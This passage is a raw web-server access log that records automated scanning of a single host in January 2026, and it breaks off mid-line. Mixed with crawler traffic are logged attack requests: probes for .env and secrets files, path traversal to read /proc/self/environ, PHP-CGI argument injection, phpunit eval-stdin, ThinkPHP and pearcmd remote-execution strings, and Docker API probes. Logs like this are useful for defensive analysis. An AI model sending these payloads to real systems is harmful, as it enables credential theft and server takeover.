91.82.83.208 "/actuator/env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/actuator/configprops" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/debug/vars" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/admin/config" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/api/config" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/api/settings" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/api/env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/.env.example" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/.env.sample" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/.env.dist" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/.env.template" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/backup/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/backups/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/old/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:27 +0000] 404 - GET http 91.82.83.208 "/temp/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/tmp/.env" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/.streamlit/secrets.toml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/.streamlit/config.toml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/app/.streamlit/secrets.toml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/home/appuser/.streamlit/secrets.toml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/root/.streamlit/secrets.toml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/src/.streamlit/secrets.toml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/.streamlit/credentials.toml" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/@fs/app/.env?raw??" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/@fs/root/.env?raw??" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/@fs/proc/self/environ?raw??" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/@fs/.env?raw??" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:28 +0000] 400 - GET http localhost-nginx-proxy-manager "-" [Client 204.76.203.125] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:23:32:28 +0000] 400 - GET http localhost-nginx-proxy-manager "-" [Client 204.76.203.125] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:23:32:28 +0000] 400 - GET http localhost-nginx-proxy-manager "-" [Client 204.76.203.125] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:23:32:28 +0000] 404 - GET http 91.82.83.208 "/@fs/..%252f..%252f..%252f..%252f..%252froot/.env?raw??" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:29 +0000] 404 - GET http 91.82.83.208 "/@fs/..%252f..%252f..%252f..%252f..%252fproc/self/environ?raw??" [Client 204.76.203.125] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:23:32:29 +0000] 400 - GET http localhost-nginx-proxy-manager "-" [Client 204.76.203.125] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:23:32:29 +0000] 400 - GET http localhost-nginx-proxy-manager "-" [Client 204.76.203.125] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:23:32:29 +0000] 400 - GET http localhost-nginx-proxy-manager "-" [Client 204.76.203.125] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:23:32:29 +0000] 400 - GET http localhost-nginx-proxy-manager "-" [Client 204.76.203.125] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:23:32:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 152.32.245.27] [Length 1033] [Gzip -] "curl/7.29.0" "-" +[18/Jan/2026:23:32:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 152.32.245.27] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:23:32:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 152.32.245.27] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:23:49:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:23:50:17 +0000] 404 - GET http 91.82.83.208 "/dispatch.asp" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:23:58:04 +0000] 400 - GET http 91.82.83.208 "/" [Client 206.168.34.42] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Jan/2026:23:58:08 +0000] 400 - - http localhost "-" [Client 206.168.34.42] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:23:58:17 +0000] 400 - GET http 91.82.83.208 "/robots.txt" [Client 206.168.34.42] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Jan/2026:23:59:01 +0000] 400 - GET http localhost "/" [Client 114.55.232.178] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:00:04:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:00:12:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:00:14:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:00:17:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:00:22:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:00:23:53 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:00:24:14 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 45.156.87.161] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[19/Jan/2026:00:24:18 +0000] 400 - GET http 91.82.83.208 "/" [Client 167.94.146.63] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:00:24:18 +0000] 400 - - http localhost "-" [Client 167.94.146.63] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:00:24:23 +0000] 400 - GET http 91.82.83.208 "/login" [Client 167.94.146.63] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:00:30:47 +0000] 404 - GET http 91.82.83.208 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:00:36:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:00:45:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:00:52:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:00:52:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:00:57:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.153.76.247] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[19/Jan/2026:00:59:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.69] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:00:59:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.69] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:01:02:09 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 23.224.68.178] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:01:02:09 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 23.224.68.178] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:01:02:09 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:10 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 23.224.68.178] [Length 154] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:10 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:10 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:10 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:11 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:11 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:11 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:11 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:11 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:12 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:12 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:12 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:12 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:13 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:13 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:13 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:13 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:14 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:14 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:14 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:14 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:15 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:15 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:15 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:15 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:16 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:16 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:16 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:16 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:17 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:17 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:17 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:17 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:17 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:18 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:18 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:18 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:19 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:19 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:19 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:19 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:19 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:02:20 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:01:04:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:01:06:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:01:07:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:01:07:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:01:07:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:01:07:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:01:07:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:01:07:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 185.91.69.5] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[19/Jan/2026:01:07:33 +0000] 405 - POST http 91.82.83.208 "/" [Client 185.91.69.5] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[19/Jan/2026:01:07:34 +0000] 405 - POST http 91.82.83.208 "/" [Client 185.91.69.5] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[19/Jan/2026:01:07:36 +0000] 404 - GET http 91.82.83.208 "/WuEL" [Client 185.91.69.5] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)" "-" +[19/Jan/2026:01:07:38 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:01:07:38 +0000] 404 - GET http 91.82.83.208 "/a" [Client 185.91.69.5] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[19/Jan/2026:01:07:39 +0000] 404 - GET http 91.82.83.208 "/download/file.ext" [Client 185.91.69.5] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[19/Jan/2026:01:07:39 +0000] 404 - GET http 91.82.83.208 "/SiteLoader" [Client 185.91.69.5] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[19/Jan/2026:01:07:41 +0000] 404 - GET http 91.82.83.208 "/mPlayer" [Client 185.91.69.5] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[19/Jan/2026:01:07:42 +0000] 405 - POST http 91.82.83.208 "/" [Client 185.91.69.5] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[19/Jan/2026:01:07:49 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.91.69.5] [Length 632] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[19/Jan/2026:01:16:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:01:26:03 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12" "-" +[19/Jan/2026:01:26:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:01:34:53 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[19/Jan/2026:01:49:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:01:53:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:01:55:03 +0000] 400 - GET http 91.82.83.208 "/" [Client 167.94.138.112] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:01:55:08 +0000] 400 - - http localhost "-" [Client 167.94.138.112] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:01:55:28 +0000] 400 - GET http 91.82.83.208 "/wiki" [Client 167.94.138.112] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:01:57:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:02:01:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:02:05:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.40] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:02:06:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 46.23.108.183] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[19/Jan/2026:02:11:40 +0000] 200 - GET http 